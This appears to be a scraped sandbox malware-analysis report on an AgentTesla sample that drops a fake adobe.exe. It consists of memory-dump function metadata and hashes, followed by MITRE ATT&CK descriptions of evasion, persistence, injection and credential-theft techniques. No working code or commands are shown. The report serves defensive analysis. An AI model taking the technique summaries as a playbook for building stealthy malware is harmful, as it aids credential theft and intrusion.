Instruction Fuzzy Hash: F6218E79F112159FDB90DF69DA40BAEBBF5EB88710F108029EA05E7354E730DD018B90

Function 028FD030 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4035793416.00000000028FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 028FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_28fd000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2dbc028ebae066d207a4496a1e7645107d09705f11535a3637d035bc15c2072d
Instruction ID: c4807c7bb4494133f4ea182ca3b22df5cd7354fbe0c8769bd40bab16b98e2de5
Opcode Fuzzy Hash: 2dbc028ebae066d207a4496a1e7645107d09705f11535a3637d035bc15c2072d
Instruction Fuzzy Hash: 092122B9504204DFDB54DF14D980B26BBA5FBC8318F24C56DEB0A8B682C33AD447CA62

Function 028FD007 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4035793416.00000000028FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 028FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_28fd000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e250f586e900a9da33fe842a21a77dd0bfb4c9caace95f3f88802271856f3d3f
Instruction ID: 92dd300224909cd6189ef734227ed8e62a5bf8bb3fb0f95823c749b9652906e3
Opcode Fuzzy Hash: e250f586e900a9da33fe842a21a77dd0bfb4c9caace95f3f88802271856f3d3f
Instruction Fuzzy Hash: CB215E7510D3C09FC703CB24D990711BF71EB86214F2985DBD9898F6A7C33A984ACB62

Function 066F4240 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4049670329.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_66f0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e59de66861f3e0171456191a420c75ffdefd2cb036248bf232ebc3929e51484
Instruction ID: 6bffb81aae71c08635c4127f90712175ae470f5e4331f1ac38e5bfc38aa33ea1
Opcode Fuzzy Hash: 0e59de66861f3e0171456191a420c75ffdefd2cb036248bf232ebc3929e51484
Instruction Fuzzy Hash: 1E01B530B140111BD76497BDD810B5B77DBDBC5710F10843AF20ACB746ED62DC4247A9

Function 066F4008 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4049670329.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_66f0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2437fcd5eb95105d28b2647c14ec36284a7120b24bef68576b2bc9b75464d6db
Instruction ID: 897729ee4b074e381cd11ab179126c7ca15b27e59d91249b8571763e711b7f2e
Opcode Fuzzy Hash: 2437fcd5eb95105d28b2647c14ec36284a7120b24bef68576b2bc9b75464d6db
Instruction Fuzzy Hash: CE11A135B101254FDF549768D9146AF73EAEBC8610F014439C606EB358EFA5DC028BE1

Function 066F3CC0 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4049670329.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_66f0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e5d02e88276fbd46b1367487c733b5fbd36e3ab53c8baa8d55a6382f75631f5
Instruction ID: df8c9c3beb2a6bccb89a708ae4893c70774de0196c6b21345ecd907dfee65b1c
Opcode Fuzzy Hash: 7e5d02e88276fbd46b1367487c733b5fbd36e3ab53c8baa8d55a6382f75631f5
Instruction Fuzzy Hash: 3521F4B1C10259AFDB10CF9AD884ADEFBF8FB48310F10812AE918B7310C3746944CBA5

Function 066FA350 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4049670329.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_66f0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a248314fe69f205ec238cefd56cd8760c4fd71b8525e30b4b48778c56e910bb
Instruction ID: 9ca93261c1eabdb6279ac8864bcf041690273d7cb1d83c58e7b1bec61cba6d97
Opcode Fuzzy Hash: 1a248314fe69f205ec238cefd56cd8760c4fd71b8525e30b4b48778c56e910bb
Instruction Fuzzy Hash: BE01F739B101109FD761A778E850B6F7BEAEB85710F108629F20ECB340EE21DD4283D5

Function 066FF1F8 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4049670329.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_66f0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7778b5b3e1ed358bb2c8e19ba12ca4f836438ae66969f055d4637aaf067794b1
Instruction ID: bef64b1c4b13d129a8f9ac953c091a2149042bb15f67d8293395f37534508d0e
Opcode Fuzzy Hash: 7778b5b3e1ed358bb2c8e19ba12ca4f836438ae66969f055d4637aaf067794b1
Instruction Fuzzy Hash: 5A01F735F141500FDB6197FDD851B2E7BDACBC9620F14886AF20ACB391DD26DC424395

Function 066F3FF9 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4049670329.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_66f0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39dcece710c33859fecfd47981302bacb9b9952a533235e191158991fdc05291
Instruction ID: 1792cde6f9726850f0cec40e882b8837db180c88752973e67e523b8677538a64
Opcode Fuzzy Hash: 39dcece710c33859fecfd47981302bacb9b9952a533235e191158991fdc05291
Instruction Fuzzy Hash: 7B01F236B204255BDF64A768EC147EF23EB9BC9610F054135D20AE7399EFA98C024BE1

Function 066F3CC8 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4049670329.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_66f0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84b98a7f164112cfc6a38c973423fa795d6cce5ebb9aa00252e4cf6aee16e668
Instruction ID: a366e4fcb020a7b3d0bcf20cdafc48d9f6191f9d300e332d4fd61d3d3adc768c
Opcode Fuzzy Hash: 84b98a7f164112cfc6a38c973423fa795d6cce5ebb9aa00252e4cf6aee16e668
Instruction Fuzzy Hash: 2911C2B1D002599FCB00CF9AD884ACEFBF8FB48320F10812AE518A7340C374A544CBA5

Function 066F4250 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4049670329.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_66f0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99d18e0d93a81331b235c8e1c1052eca638fdbf895167e1c98492d884053db00
Instruction ID: 7c60e7a08d4f1a486881b0fa2a9f87469edd8c951eb0b77fee2e62a3ef5f0bf4
Opcode Fuzzy Hash: 99d18e0d93a81331b235c8e1c1052eca638fdbf895167e1c98492d884053db00
Instruction Fuzzy Hash: 12018131B104114BDB6497BDD450B6FA6DBDBC9720F10883AE70ACB785ED62DC424395

Function 066FF208 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4049670329.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_66f0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ffcbfb4ecce68804417dafff7b89c62922ec68d38c75474fb081d238ae26342
Instruction ID: df3dfc87bc57b8d89d6dd80301fceced3060bc8d8a477c69ef8546a3c46a62a8
Opcode Fuzzy Hash: 6ffcbfb4ecce68804417dafff7b89c62922ec68d38c75474fb081d238ae26342
Instruction Fuzzy Hash: 3B018135F200114BDB6497BDE85072E67DADBC9620F14842AE20ACB354DE62DC424785

Function 066FA360 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4049670329.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_66f0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32a119ea71c6b500bac72864f280d9aefe7cbad214ad99c83f4fbb3a143a97d7
Instruction ID: e1136a87519e96a5ee8e77affe494850cfcdfa1175a9ae2932a37875c980553f
Opcode Fuzzy Hash: 32a119ea71c6b500bac72864f280d9aefe7cbad214ad99c83f4fbb3a143a97d7
Instruction Fuzzy Hash: 07013135B20515DBDB64E7B9E450B2E77D6EB89710F108529E20ECB354DE21EC4287C5

Function 066F64B8 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4049670329.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_66f0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bcba1a3bc966c017d7159dd591bc390e423373f6eaf8fe19bde95a304e4595a4
Instruction ID: efb362d2381d3eaffd7868ee092154704f0e5a81373ecd4e9a75a57343892832
Opcode Fuzzy Hash: bcba1a3bc966c017d7159dd591bc390e423373f6eaf8fe19bde95a304e4595a4
Instruction Fuzzy Hash: 97E09270E282496BDB60DBB0D959B5A7B6DD702204F1084A9E904DB202E176DE018791

Non-executed Functions

Function 066F76E8 Relevance: 13.0, Strings: 10, Instructions: 468COMMON

Download Yara Rule

Strings

$eq, xrefs: 066F7824
$eq, xrefs: 066F7C71
$eq, xrefs: 066F7BB0
$eq, xrefs: 066F7C5B
$eq, xrefs: 066F7C65
$eq, xrefs: 066F7830
$eq, xrefs: 066F77F3
$eq, xrefs: 066F7BBC
$eq, xrefs: 066F77FF
$eq, xrefs: 066F7C4F

Memory Dump Source

Source File: 00000008.00000002.4049670329.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_66f0000_adobe.jbxd

Similarity

API ID:
String ID: $eq$$eq$$eq$$eq$$eq$$eq$$eq$$eq$$eq$$eq
API String ID: 0-2049195972
Opcode ID: b9455c2f9db693ecc95412324937b8b12f742a5a74cdcb03958ebb53e5205413
Instruction ID: 597e64f56b968f8d973043f8dc6cef3bed1456c4696c66c40344c93127781ce2
Opcode Fuzzy Hash: b9455c2f9db693ecc95412324937b8b12f742a5a74cdcb03958ebb53e5205413
Instruction Fuzzy Hash: 10123D34E11219CFDB64DF65D954AAEBBB2FF89300F208569D50AAB354DB309D81CF81

Function 066FA980 Relevance: 10.2, Strings: 8, Instructions: 229COMMON

Download Yara Rule

Strings

$eq, xrefs: 066FAAFC
$eq, xrefs: 066FAAD1
$eq, xrefs: 066FAB08
$eq, xrefs: 066FAADD
$eq, xrefs: 066FAB3E
$eq, xrefs: 066FAA82
$eq, xrefs: 066FAB32
$eq, xrefs: 066FAA76

Memory Dump Source

Source File: 00000008.00000002.4049670329.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_66f0000_adobe.jbxd

Similarity

API ID:
String ID: $eq$$eq$$eq$$eq$$eq$$eq$$eq$$eq
API String ID: 0-1110479544
Opcode ID: bbb258e2a1a7e21d6fcebf5adf067e21436f7dda304bfcaec88a848565b29454
Instruction ID: ef79647a1e71db10d913aa1b5e677f3c3bda9aafcf8faa47410bfa7175ed4551
Opcode Fuzzy Hash: bbb258e2a1a7e21d6fcebf5adf067e21436f7dda304bfcaec88a848565b29454
Instruction Fuzzy Hash: CE918F34A20209DFEBA4DFA5D69476E7BF3BF84300F208529D50A9B394DB749D41CB91

Function 066F70E8 Relevance: 9.2, Strings: 7, Instructions: 405COMMON

Download Yara Rule

Strings

$eq, xrefs: 066F7430
$eq, xrefs: 066F73CA
$eq, xrefs: 066F75F0
.5}q, xrefs: 066F7143
$eq, xrefs: 066F7424
$eq, xrefs: 066F7584
$eq, xrefs: 066F75FC

Memory Dump Source

Source File: 00000008.00000002.4049670329.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_66f0000_adobe.jbxd

Similarity

API ID:
String ID: .5}q$$eq$$eq$$eq$$eq$$eq$$eq
API String ID: 0-1622854337
Opcode ID: c3b0087e4744234e575a53c00b85bf23e44221bd17db2b29a01330ec1d06d76a
Instruction ID: fe2e5673aaac296a56dd32405390c39f18a1b523b9f3744481cd0fc31845781d
Opcode Fuzzy Hash: c3b0087e4744234e575a53c00b85bf23e44221bd17db2b29a01330ec1d06d76a
Instruction Fuzzy Hash: 2BF13A34A10208CFDB55EFA9D554A6EBBB3FF84304F248568D5059B3A8DB35AD42CB81

Function 066F8418 Relevance: 5.3, Strings: 4, Instructions: 282COMMON

Download Yara Rule

Strings

$eq, xrefs: 066F86D7
$eq, xrefs: 066F86E3
$eq, xrefs: 066F867E
$eq, xrefs: 066F8672

Memory Dump Source

Source File: 00000008.00000002.4049670329.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_66f0000_adobe.jbxd

Similarity

API ID:
String ID: $eq$$eq$$eq$$eq
API String ID: 0-812946093
Opcode ID: 4b319dc0ac640da8d22cc0281427781f55a1d10d7ff8669ad7d8dde3638b4e9b
Instruction ID: b44b025728b190e0b016bd3771920081731014211e27a4eba840fe4ef8a33caa
Opcode Fuzzy Hash: 4b319dc0ac640da8d22cc0281427781f55a1d10d7ff8669ad7d8dde3638b4e9b
Instruction Fuzzy Hash: 23B12934A20209CFDB54EB69D5507AEB7B2EF84304F24846DD506EB399DB74EC82CB81

Function 066FAD08 Relevance: 5.2, Strings: 4, Instructions: 172COMMON

Download Yara Rule

Strings

$eq, xrefs: 066FAE8C
$eq, xrefs: 066FAE39
$eq, xrefs: 066FAEE4
$eq, xrefs: 066FAEBB

Memory Dump Source

Source File: 00000008.00000002.4049670329.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_66f0000_adobe.jbxd

Similarity

API ID:
String ID: $eq$$eq$$eq$$eq
API String ID: 0-812946093
Opcode ID: ef14e322879821d2c5603f9a42e53eb95362ca98a67163e45a830d8069cb79a6
Instruction ID: 178f053046dfda941ece055442429acd2f2b599f0434d5abc168396e694f516f
Opcode Fuzzy Hash: ef14e322879821d2c5603f9a42e53eb95362ca98a67163e45a830d8069cb79a6
Instruction Fuzzy Hash: 63519334E21205CFDFA5DBA4D5806AEB7B2FB88311F248529E91ADB345DB31DC42CB91

Function 066F8830 Relevance: 5.2, Strings: 4, Instructions: 168COMMON

Download Yara Rule

Strings

$eq, xrefs: 066F88AF
$eq, xrefs: 066F88BB
LReq, xrefs: 066F8972
LReq, xrefs: 066F8923

Memory Dump Source

Source File: 00000008.00000002.4049670329.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_66f0000_adobe.jbxd

Similarity

API ID:
String ID: LReq$LReq$$eq$$eq
API String ID: 0-731573373
Opcode ID: 35d86343c05bb08d3e385860b7b99a168b25213281df4c4df541b740e1a7d70c
Instruction ID: 09db9fbd4af36218d5744852858f5c0291ea72f2f0f5c9a7524f0b481520a37b
Opcode Fuzzy Hash: 35d86343c05bb08d3e385860b7b99a168b25213281df4c4df541b740e1a7d70c
Instruction Fuzzy Hash: 5A51AE30B102019FDB54EB29D990A6AB7F6FB88304F1485ADE516DF3A9DB31EC41CB81

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report ukBQ4ch2nE.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Agenttesla

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Roaming\Adobe\adobe.exe

C:\Users\user\AppData\Roaming\Adobe\adobe.exe:Zone.Identifier

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Windows Analysis Report
ukBQ4ch2nE.exe

Function 05879330 Relevance: 3.1, APIs: 2, Instructions: 106
memoryinjectionCOMMON

Function 05879198 Relevance: 3.1, APIs: 2, Instructions: 101
threadCOMMON

Function 05879270 Relevance: 3.1, APIs: 2, Instructions: 91
memorythreadCOMMON

Function 058795B4 Relevance: 1.7, APIs: 1, Instructions: 246
processCOMMON

Function 058795C0 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Function 0316B0B0 Relevance: 1.7, APIs: 1, Instructions: 193
COMMON

Function 0316590D Relevance: 1.6, APIs: 1, Instructions: 100
COMMON

Function 05870BE4 Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Function 03164248 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Function 05879338 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Function 0316CE58 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Function 05879423 Relevance: 1.6, APIs: 1, Instructions: 64
COMMON

Function 058791A0 Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
